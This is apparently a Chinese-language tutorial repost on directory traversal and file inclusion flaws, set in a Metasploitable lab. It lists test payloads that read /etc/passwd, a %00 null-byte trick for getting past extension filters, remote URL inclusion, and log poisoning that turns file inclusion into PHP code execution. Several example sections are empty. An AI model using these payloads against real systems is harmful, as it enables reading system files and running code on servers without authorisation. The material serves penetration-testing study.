當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

目录遍历和文件包含

發布時間：2025/3/15 编程问答 20 豆豆

生活随笔收集整理的這篇文章主要介紹了目录遍历和文件包含小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

含有目錄遍歷和文件包含漏洞的特征：變量=頁面；文件=值；

經典的測試方法：編碼后也可以

../../../../../../../../etc/passwd file:///etc/passwd main.cgi http://www.a.com/1.php htp://1.1.1.1/../../../../../../dir/file.txt

編碼繞過字符過濾

繞過文件擴展名過濾：“.”；"%00"
?file = a.doc%00.php==========file = a.doc

編碼繞過過濾： 用自動化工具轉化

其他系統路徑可能使用到的字符

例

代碼執行

當用戶有對log文件有讀取和執行權限：可以先向log文件傳入一條php代碼，然后在url中用文件包含執行代碼。

PS：前提：必須要有www-data對log文件的讀取和執行權限。

metasploitable配置：

例（引用）

在192.168.181.132機器上包含192.168.181.128上的php代碼。

字典：

以上是生活随笔為你收集整理的目录遍历和文件包含的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。